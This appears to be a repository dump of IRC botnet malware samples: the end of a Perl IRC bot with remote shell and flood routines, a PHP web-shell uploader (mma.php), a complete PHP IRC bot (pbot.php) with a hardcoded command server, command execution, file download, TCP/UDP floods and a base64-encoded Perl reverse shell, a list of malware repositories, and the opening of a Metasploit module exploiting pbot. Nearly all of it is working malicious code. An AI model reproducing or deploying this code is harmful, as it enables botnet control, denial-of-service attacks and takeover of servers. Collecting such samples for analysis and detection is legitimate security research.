 818 |       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
 819 |    }
 820 |    if ($case =~ /^msg\s+(\S+) (.*)/) {
 821 |       msg("$1", "$2");
 822 |    }
 823 |    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
 824 |       for (my $cf = 1; $cf <= $1; $cf++) {
 825 |         msg("$2", "$3");
 826 |       }
 827 |    }
 828 |    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
 829 |       ctcp("$1", "$2");
 830 |    }
 831 |    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
 832 |       for (my $cf = 1; $cf <= $1; $cf++) {
 833 |         ctcp("$2", "$3");
 834 |       }
 835 |    }
 836 |    if ($case =~ /^nick (.*)/) {
 837 |       nick("$1");
 838 |    }
 839 |    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
 840 |        conectar("$2", "$1", 6667);
 841 |    }
 842 |    if ($case =~ /^raw (.*)/) {
 843 |       sendraw("$1");
 844 |    }
 845 |    if ($case =~ /^eval (.*)/) {
 846 |      eval "$1";
 847 |    }
 848 | }
 849 | 
 850 | sub shell {
 851 |   my $printl=$_[0];
 852 |   my $comando=$_[1];
 853 |   if ($comando =~ /cd (.*)/) {
 854 |     chdir("$1") || msg("$printl", "No such file or directory");
 855 |     return;
 856 |   } 
 857 |   elsif ($pid = fork) {
 858 |      waitpid($pid, 0);
 859 |   } else {
 860 |       if (fork) {
 861 |          exit;
 862 |        } else {
 863 |            my @resp=`$comando 2>&1 3>&1`;
 864 |            my $c=0;
 865 |            foreach my $linha (@resp) {
 866 |              $c++;
 867 |              chop $linha;
 868 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
 869 |              if ($c == "$linas_max") {
 870 |                $c=0;
 871 |                sleep $sleep;
 872 |              }
 873 |            }
 874 |            exit;
 875 |        }
 876 |   }
 877 | }
 878 | 
 879 | sub tcpflooder {
 880 |  my $itime = time;
 881 |  my ($cur_time);
 882 |  my ($ia,$pa,$proto,$j,$l,$t);
 883 |  $ia=inet_aton($_[0]);
 884 |  $pa=sockaddr_in($_[1],$ia);
 885 |  $ftime=$_[2];
 886 |  $proto=getprotobyname('tcp');
 887 |  $j=0;$l=0;
 888 |  $cur_time = time - $itime;
 889 |  while ($l<1000){
 890 |   $cur_time = time - $itime;
 891 |   last if $cur_time >= $ftime;
 892 |   $t="SOCK$l";
 893 |   socket($t,PF_INET,SOCK_STREAM,$proto);
 894 |   connect($t,$pa)||$j--;
 895 |   $j++;$l++;
 896 |  }
 897 |  $l=0;
 898 |  while ($l<1000){
 899 |   $cur_time = time - $itime;
 900 |   last if $cur_time >= $ftime;
 901 |   $t="SOCK$l";
 902 |   shutdown($t,2);
 903 |   $l++;
 904 |  }
 905 | }
 906 | 
 907 | sub udpflooder {
 908 |   my $iaddr = inet_aton($_[0]);
 909 |   my $msg = 'A' x $_[1];
 910 |   my $ftime = $_[2];
 911 |   my $cp = 0;
 912 |   my (%pacotes);
 913 |   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
 914 |   
 915 |   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
 916 |   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
 917 |   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
 918 |   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
 919 |   return(undef) if $cp == 4;
 920 |   my $itime = time;
 921 |   my ($cur_time);
 922 |   while ( 1 ) {
 923 |      for (my $port = 1; $port <= 65000; $port++) {
 924 |        $cur_time = time - $itime;
 925 |        last if $cur_time >= $ftime;
 926 |        send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
 927 |        send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
 928 |        send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
 929 |        send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
 930 | 
 931 |        for (my $pc = 3; $pc <= 255;$pc++) {
 932 |          next if $pc == 6;
 933 |          $cur_time = time - $itime;
 934 |          last if $cur_time >= $ftime;
 935 |          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
 936 |          send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
 937 |        }
 938 |      }
 939 |      last if $cur_time >= $ftime;
 940 |   }
 941 |   return($cur_time, %pacotes);
 942 | }
 943 | 
 944 | sub udpflooder2 {
 945 |   my $iaddr = inet_aton($_[0]);
 946 |   my $msg = 'A' x $_[1];
 947 |   my $ftime = $_[2];
 948 |   my $cp = 0;
 949 |   my $udpport = $_[3];
 950 |   my (%pacotes);
 951 |   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
 952 |   
 953 |   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
 954 |   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
 955 |   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
 956 |   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
 957 |   return(undef) if $cp == 4;
 958 |   my $itime = time;
 959 |   my ($cur_time);
 960 |   while ( 1 ) {
 961 |        $cur_time = time - $itime;
 962 |        last if $cur_time >= $ftime;
 963 |        send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
 964 |        send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
 965 |        send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
 966 |        send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;
 967 | 
 968 |        for (my $pc = 3; $pc <= 255;$pc++) {
 969 |          next if $pc == 6;
 970 |          $cur_time = time - $itime;
 971 |          last if $cur_time >= $ftime;
 972 |          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
 973 |          send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
 974 |      }
 975 |      last if $cur_time >= $ftime;
 976 |   }
 977 |   return($cur_time, %pacotes);
 978 | }
 979 | sub ctcp {
 980 |    return unless $#_ == 1;
 981 |    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
 982 | }
 983 | sub msg {
 984 |    return unless $#_ == 1;
 985 |    sendraw("PRIVMSG $_[0] :$_[1]");
 986 | }  
 987 | sub notice {
 988 |    return unless $#_ == 1;
 989 |    sendraw("NOTICE $_[0] :$_[1]");
 990 | }
 991 | sub op {
 992 |    return unless $#_ == 1;
 993 |    sendraw("MODE $_[0] +o $_[1]");
 994 | }
 995 | sub deop {
 996 |    return unless $#_ == 1;
 997 |    sendraw("MODE $_[0] -o $_[1]");
 998 | }
 999 | sub j { &join(@_); }
1000 | sub join {
1001 |    return unless $#_ == 0;
1002 |    sendraw("JOIN $_[0]");
1003 | }
1004 | sub p { part(@_); }
1005 | sub part {
1006 |   sendraw("PART $_[0]");
1007 | }
1008 | sub nick {
1009 |   return unless $#_ == 0;
1010 |   sendraw("NICK $_[0]");
1011 | }
1012 | sub quit {
1013 |   sendraw("QUIT :$_[0]");
1014 | }
1015 | 


--------------------------------------------------------------------------------
/malicious_samples/mma.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | echo '<b><br><br>'.php_uname().'<br></b>'; 
 3 | echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; 
 4 | echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; 
 5 | if( $_POST['_upl'] == "Upload" ) { 	
 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>uplod d0n3 in SAME file // Th3 MMA \\</b><br><br>'; } 	
 7 | else { echo '<b>Upload GAGAL !!!</b><br><br>'; 
 8 | } } 
 9 | ?>
10 | 


--------------------------------------------------------------------------------
/malicious_samples/open_source_repos.md:
--------------------------------------------------------------------------------
1 | ## Open Source Repositories
2 | 
3 | - https://github.com/evilxyz/IRC-Bot - Botnet Trojan Based on IRC Protocol by evilxyz
4 | - https://github.com/eurialo/lightaidra - Lightaidra, IRC-based mass router scanner/exploiter
5 | - https://github.com/petikvx/extract-vs-2012-06 - Malware Collection
6 | - https://github.com/petikvx/malwares-collection - collection of sources of Virii - Worms - Trojan
7 | 


--------------------------------------------------------------------------------
/malicious_samples/pbot.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /*
  4 | *
  5 | * since 2000
  6 | * REcoding by: busabos
  7 | *
  8 | * COMMANDS:
  9 | *
 10 | * .user <password> //login to the bot
 11 | * .logout //logout of the bot
 12 | * .die //kill the bot
 13 | * .restart //restart the bot
 14 | * .mail <to> <from> <subject> <msg> //send an email
 15 | * .dns <IP|HOST> //dns lookup
 16 | * .download <URL> <filename> //download a file
 17 | * .exec <cmd> // uses exec() //execute a command
 18 | * .sexec <cmd> // uses shell_exec() //execute a command
 19 | * .cmd <cmd> // uses popen() //execute a command
 20 | * .info //get system information
 21 | * .php <php code> // uses eval() //execute php code
 22 | * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 23 | * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 24 | * .raw <cmd> //raw IRC command
 25 | * .rndnick //change nickname
 26 | * .pscan <host> <port> //port scan
 27 | * .safe // test safe_mode (dvl)
 28 | * .inbox <to> // test inbox (dvl)
 29 | * .conback <ip> <port> // conect back (dvl)
 30 | * .uname // return shell's uname using a php function (dvl)
 31 | *
 32 | */
 33 | 
 34 | set_time_limit(0);
 35 | error_reporting(0);
 36 | echo "ok!";
 37 | 
 38 | class pBot
 39 | {
 40 | var $config = array("server"=>"198.251.89.119",
 41 | "port"=>"443",
 42 | "pass"=>"",
 43 | "prefix"=>"boot",
 44 | "maxrand"=>"5",
 45 | "chan"=>"#zmap",
 46 | "chan2"=>"#zmap",
 47 | "key"=>"",
 48 | "modes"=>"+ps",
 49 | "password"=>"hacker",
 50 | "trigger"=>".",
 51 | "hostauth"=>"*" // * for any hostname (remember: /setvhost pipod.tv)
 52 | );
 53 | var $users = array();
 54 | function start()
 55 | {
 56 | if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
 57 | $this->start();
 58 | $ident = $this->config['prefix'];
 59 | $alph = range("0","9");
 60 | for($i=0;$i<$this->config['maxrand'];$i++)
 61 | $ident .= $alph[rand(0,9)];
 62 | if(strlen($this->config['pass'])>0)
 63 | $this->send("PASS ".$this->config['pass']);
 64 | $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
 65 | $this->set_nick();
 66 | $this->main();
 67 | }
 68 | function main()
 69 | {
 70 | while(!feof($this->conn))
 71 | {
 72 | $this->buf = trim(fgets($this->conn,512));
 73 | $cmd = explode(" ",$this->buf);
 74 | if(substr($this->buf,0,6)=="PING :")
 75 | {
 76 | $this->send("PONG :".substr($this->buf,6));
 77 | }
 78 | if(isset($cmd[1]) && $cmd[1] =="001")
 79 | {
 80 | $this->send("MODE ".$this->nick." ".$this->config['modes']);
 81 | $this->join($this->config['chan'],$this->config['key']);
 82 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
 83 | else { $safemode = "off"; }
 84 | $uname = php_uname();
 85 | $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
 86 | 
 87 | }
 88 | if(isset($cmd[1]) && $cmd[1]=="433")
 89 | {
 90 | $this->set_nick();
 91 | }
 92 | if($this->buf != $old_buf)
 93 | {
 94 | $mcmd = array();
 95 | $msg = substr(strstr($this->buf," :"),2);
 96 | $msgcmd = explode(" ",$msg);
 97 | $nick = explode("!",$cmd[0]);
 98 | $vhost = explode("@",$nick[1]);
 99 | $vhost = $vhost[1];
100 | $nick = substr($nick[0],1);
101 | $host = $cmd[0];
102 | if($msgcmd[0]==$this->nick)
103 | {
104 | for($i=0;$i<count($msgcmd);$i++)
105 | $mcmd[$i] = $msgcmd[$i+1];
106 | }
107 | else
108 | {
109 | for($i=0;$i<count($msgcmd);$i++)
110 | $mcmd[$i] = $msgcmd[$i];
111 | }
112 | if(count($cmd)>2)
113 | {
114 | switch($cmd[1])
115 | {
116 | case "QUIT":
117 | if($this->is_logged_in($host))
118 | {
119 | $this->log_out($host);
120 | }
121 | break;
122 | case "PART":
123 | if($this->is_logged_in($host))
124 | {
125 | $this->log_out($host);
126 | }
127 | break;
128 | case "PRIVMSG":
129 | if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
130 | {
131 | if(substr($mcmd[0],0,1)==".")
132 | {
133 | switch(substr($mcmd[0],1))
134 | {
135 | case "user":
136 | if($mcmd[1]==$this->config['password'])
137 | {
138 | $this->privmsg($this->config['chan'],"[\2Auth\2]: User authenticated. Hello Master $nick");
139 | $this->log_in($host);
140 | }
141 | else
142 | {
143 | $this->privmsg($this->config['chan'],"[\2Auth\2]: Incorrect Password. Self destruct in 10 secs.joke $nick !!!!");
144 | }
145 | break;
146 | }
147 | }
148 | }
149 | elseif($this->is_logged_in($host))
150 | {
151 | if(substr($mcmd[0],0,1)==".")
152 | {
153 | switch(substr($mcmd[0],1))
154 | {
155 | case "restart":
156 | $this->send("QUIT :restart command from $nick");
157 | fclose($this->conn);
158 | $this->start();
159 | break;
160 | case "mail": //mail to from subject message
161 | if(count($mcmd)>4)
162 | {
163 | $header = "From: <".$mcmd[2].">";
164 | if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
165 | {
166 | $this->privmsg($this->config['chan'],"[\2mail\2]: Message Not Sent.");
167 | }
168 | else
169 | {
170 | $this->privmsg($this->config['chan'],"[\2mail\2]: Message Sent \2".$mcmd[1]."\2");
171 | }
172 | }
173 | break;
174 | case "safe":
175 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
176 | {
177 | $safemode = "on";
178 | }
179 | else {
180 | $safemode = "off";
181 | }
182 | $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
183 | break;
184 | case "inbox": //test inbox
185 | if(isset($mcmd[1]))
186 | {
187 | $token = md5(uniqid(rand(), true));
188 | $header = "From: <inbox".$token."mikel0188@gmail.com>";
189 | $a = php_uname();
190 | $b = getenv("SERVER_SOFTWARE");
191 | $c = gethostbyname($_SERVER["HTTP_HOST"]);
192 | if(!mail($mcmd[1],"InBox Test","#mikel0188@gmail.com. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <my1@email.com>",$header))
193 | {
194 | $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
195 | }
196 | else
197 | {
198 | $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
199 | }
200 | }
201 | break;
202 | case "conback":
203 | if(count($mcmd)>2)
204 | {
205 | $this->conback($mcmd[1],$mcmd[2]);
206 | }
207 | break;
208 | case "dns":
209 | if(isset($mcmd[1]))
210 | {
211 | $ip = explode(".",$mcmd[1]);
212 | if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
213 | {
214 | $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
215 | }
216 | else
217 | {
218 | $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
219 | }
220 | }
221 | break;
222 | case "info":
223 | case "vuln":
224 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
225 | else { $safemode = "off"; }
226 | $uname = php_uname();
227 | $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
228 | break;
229 | case "bot":
230 | $this->privmsg($this->config['chan'],"[\2bot\2]: just a fucking bot.");
231 | break;
232 | case "uname":
233 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
234 | else { $safemode = "off"; }
235 | $uname = php_uname();
236 | $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
237 | break;
238 | case "rndnick":
239 | $this->set_nick();
240 | break;
241 | case "raw":
242 | $this->send(strstr($msg,$mcmd[1]));
243 | break;
244 | case "eval":
245 | $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
246 | break;
247 | case "sexec":
248 | $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
249 | $exec = shell_exec($command);
250 | $ret = explode("\n",$exec);
251 | for($i=0;$i<count($ret);$i++)
252 | if($ret[$i]!=NULL)
253 | $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
254 | break;
255 | 
256 | case "exec":
257 | $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
258 | $exec = exec($command);
259 | $ret = explode("\n",$exec);
260 | for($i=0;$i<count($ret);$i++)
261 | if($ret[$i]!=NULL)
262 | $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
263 | break;
264 | 
265 | case "passthru":
266 | $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
267 | $exec = passthru($command);
268 | $ret = explode("\n",$exec);
269 | for($i=0;$i<count($ret);$i++)
270 | if($ret[$i]!=NULL)
271 | $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
272 | break;
273 | 
274 | case "popen":
275 | if(isset($mcmd[1]))
276 | {
277 | $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
278 | $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
279 | $pipe = popen($command,"r");
280 | while(!feof($pipe))
281 | {
282 | $pbuf = trim(fgets($pipe,512));
283 | if($pbuf != NULL)
284 | $this->privmsg($this->config['chan']," : $pbuf");
285 | }
286 | pclose($pipe);
287 | }
288 | 
289 | case "system":
290 | $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
291 | $exec = system($command);
292 | $ret = explode("\n",$exec);
293 | for($i=0;$i<count($ret);$i++)
294 | if($ret[$i]!=NULL)
295 | $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
296 | break;
297 | 
298 | 
299 | case "pscan": // .pscan 127.0.0.1 6667
300 | if(count($mcmd) > 2)
301 | {
302 | if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
303 | $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
304 | else
305 | $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
306 | }
307 | break;
308 | 
309 | 
310 | case "download":
311 | if(count($mcmd) > 2)
312 | {
313 | if(!$fp = fopen($mcmd[2],"w"))
314 | {
315 | $this->privmsg($this->config['chan'],"[\2download\2]: Cannot Download... permission denied.");
316 | }
317 | else
318 | {
319 | if(!$get = file($mcmd[1]))
320 | {
321 | $this->privmsg($this->config['chan'],"[\2download\2]: Sorry Not Available \2".$mcmd[1]."\2");
322 | }
323 | else
324 | {
325 | for($i=0;$i<=count($get);$i++)
326 | {
327 | fwrite($fp,$get[$i]);
328 | }
329 | $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 File Downloaded \2".$mcmd[2]."\2");
330 | }
331 | fclose($fp);
332 | }
333 | }
334 | else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
335 | break;
336 | case "die":
337 | $this->send("QUIT : $fulldate [-scryptzoid-]");
338 | fclose($this->conn);
339 | exit;
340 | case "logout":
341 | $this->log_out($host);
342 | $this->privmsg($this->config['chan'],"[\2auth\2]: $nick bleeh!");
343 | break;
344 | case "udpflood":
345 | if(count($mcmd)>3)
346 | {
347 | $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
348 | }
349 | break;
350 | case "tcpflood":
351 | if(count($mcmd)>5)
352 | {
353 | $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
354 | }
355 | break;
356 | }
357 | }
358 | }
359 | break;
360 | }
361 | }
362 | }
363 | $old_buf = $this->buf;
364 | }
365 | $this->start();
366 | }
367 | function send($msg)
368 | {
369 | fwrite($this->conn,"$msg\r\n");
370 | 
371 | }
372 | function join($chan,$key=NULL)
373 | {
374 | $this->send("JOIN $chan $key");
375 | }
376 | function privmsg($to,$msg)
377 | {
378 | $this->send("PRIVMSG $to :$msg");
379 | }
380 | function notice($to,$msg)
381 | {
382 | $this->send("NOTICE $to :$msg");
383 | }
384 | function is_logged_in($host)
385 | {
386 | if(isset($this->users[$host]))
387 | return 1;
388 | else
389 | return 0;
390 | }
391 | function log_in($host)
392 | {
393 | $this->users[$host] = true;
394 | }
395 | function log_out($host)
396 | {
397 | unset($this->users[$host]);
398 | }
399 | function set_nick()
400 | {
401 | if(isset($_SERVER['SERVER_SOFTWARE']))
402 | {
403 | if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
404 | $this->nick = "[A]";
405 | elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
406 | $this->nick = "[b]";
407 | elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
408 | $this->nick = "[C]";
409 | else
410 | $this->nick = "[D]";
411 | }
412 | else
413 | {
414 | $this->nick = "[E]";
415 | }
416 | $this->nick .= $this->config['prefix'];
417 | for($i=0;$i<$this->config['maxrand'];$i++)
418 | $this->nick .= mt_rand(0,9);
419 | $this->send("NICK ".$this->nick);
420 | }
421 | function udpflood($host,$packetsize,$time) {
422 | $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
423 | $packet = "";
424 | for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
425 | $timei = time();
426 | $i = 0;
427 | while(time()-$timei < $time) {
428 | $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
429 | fwrite($fp,$packet);
430 | fclose($fp);
431 | $i++;
432 | }
433 | $env = $i * $packetsize;
434 | $env = $env / 1048576;
435 | $vel = $env / $time;
436 | $vel = round($vel);
437 | $env = round($env);
438 | $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB sent / Media: $vel MB/s ");
439 | }
440 | function tcpflood($host,$packets,$packetsize,$port,$delay)
441 | {
442 | $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
443 | $packet = "";
444 | for($i=0;$i<$packetsize;$i++)
445 | $packet .= chr(mt_rand(1,256));
446 | for($i=0;$i<$packets;$i++)
447 | {
448 | if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
449 | {
450 | $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
451 | return 0;
452 | }
453 | else
454 | {
455 | fwrite($fp,$packet);
456 | fclose($fp);
457 | }
458 | sleep($delay);
459 | }
460 | $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets A gift to $host:$port.");
461 | }
462 | function conback($ip,$port)
463 | {
464 | $this->privmsg($this->config['chan'],"[\2conback\2]: Trying To Establish Connection $ip:$port");
465 | $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
466 | if (is_writable("/tmp"))
467 | {
468 | if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
469 | $fp=fopen("/tmp/dc.pl","w");
470 | fwrite($fp,base64_decode($dc_source));
471 | passthru("perl /tmp/dc.pl $ip $port &");
472 | unlink("/tmp/dc.pl");
473 | }
474 | else
475 | {
476 | if (is_writable("/var/tmp"))
477 | {
478 | if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
479 | $fp=fopen("/var/tmp/dc.pl","w");
480 | fwrite($fp,base64_decode($dc_source));
481 | passthru("perl /var/tmp/dc.pl $ip $port &");
482 | unlink("/var/tmp/dc.pl");
483 | }
484 | if (is_writable("."))
485 | {
486 | if (file_exists("dc.pl")) { unlink("dc.pl"); }
487 | $fp=fopen("dc.pl","w");
488 | fwrite($fp,base64_decode($dc_source));
489 | passthru("perl dc.pl $ip $port &");
490 | unlink("dc.pl");
491 | }
492 | }
493 | }
494 | }
495 | 
496 | $bot = new pBot;
497 | $bot->start();
498 | 
499 | ?>
500 | 


--------------------------------------------------------------------------------
/pbot_exec.rb:
--------------------------------------------------------------------------------
  1 | ##
  2 | # This module requires Metasploit: http://metasploit.com/download
  3 | # Current source: https://github.com/rapid7/metasploit-framework
  4 | ##
  5 | 
  6 | require 'msf/core'
  7 | 
  8 | 
  9 | class MetasploitModule < Msf::Exploit::Remote
 10 |   Rank = ExcellentRanking
 11 | 
 12 |   include Msf::Exploit::Remote::Tcp
 13 | 
 14 |   def initialize(info = {})
 15 |     super(update_info(info,
 16 |       'Name'           => 'PHP IRC Bot pbot eval() Remote Code Execution',
 17 |       'Description'    => %q{
 18 |           This module allows remote command execution on the PHP IRC bot pbot by abusing
 19 |         the usage of eval() in the implementation of the .php command. In order to work,
 20 |         the data to connect to the IRC server and channel where find pbot must be provided.
 21 |         The module has been successfully tested on the version of pbot analyzed by Jay
 22 |         Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP
 23 |         SP3.
 24 |         },
 25 |       'Author'         =>
 26 |         [
 27 |           'evilcry', # pbot analysis'
 28 |           'Jay Turla', # pbot analysis
 29 |           'bwall', # aka @bwallHatesTwits, PoC
 30 |           'juan vazquez' # Metasploit module
 31 |         ],
 32 |       'License'        => MSF_LICENSE,
 33 |       'References'     =>
 34 |         [
 35 |           [ 'OSVDB', '84913' ],
 36 |           [ 'EDB', '20168' ],
 37 |           [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']
 38 |         ],
 39 |       'Platform'       => %w{ unix win },
 40 |       'Arch'           => ARCH_CMD,
 41 |       'Payload'        =>
 42 |         {
 43 |           'Space'    => 344, # According to RFC 2812, the max length message is 512, including the cr-lf
 44 |           'BadChars' => '',
 45 |           'DisableNops' => true,
 46 |           'Compat'      =>
 47 |             {
 48 |               'PayloadType' => 'cmd',
 49 |             }
 50 |         },
 51 |       'Targets'  =>
 52 |         [
 53 |           [ 'pbot', { } ]
 54 |         ],
 55 |       'Privileged'     => false,
 56 |       'DisclosureDate' => 'Nov 02 2009',
 57 |       'DefaultTarget'  => 0))
 58 | 
 59 |     register_options(
 60 |       [
 61 |         Opt::RPORT(6667),
 62 |         OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
 63 |         OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
 64 |         OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),
 65 |         OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])
 66 |       ], self.class)
 67 |   end
 68 | 
 69 |   def check
 70 |     connect
 71 | 
 72 |     response = register(sock)
 73 |     if response =~ /463/ or response =~ /464/
 74 |       vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
 75 |       return Exploit::CheckCode::Unknown
 76 |     end
 77 | 
 78 |     response = join(sock)
 79 |     if not response =~ /353/ and not response =~ /366/
 80 |       vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
 81 |       return Exploit::CheckCode::Unknown
 82 |     end
 83 |     response = pbot_login(sock)
 84 |     quit(sock)
 85 |     disconnect
 86 | 
 87 |     if response =~ /auth/ and response =~ /logged in/
 88 |       return Exploit::CheckCode::Vulnerable
 89 |     else
 90 |       return Exploit::CheckCode::Safe
 91 |     end
 92 |   end
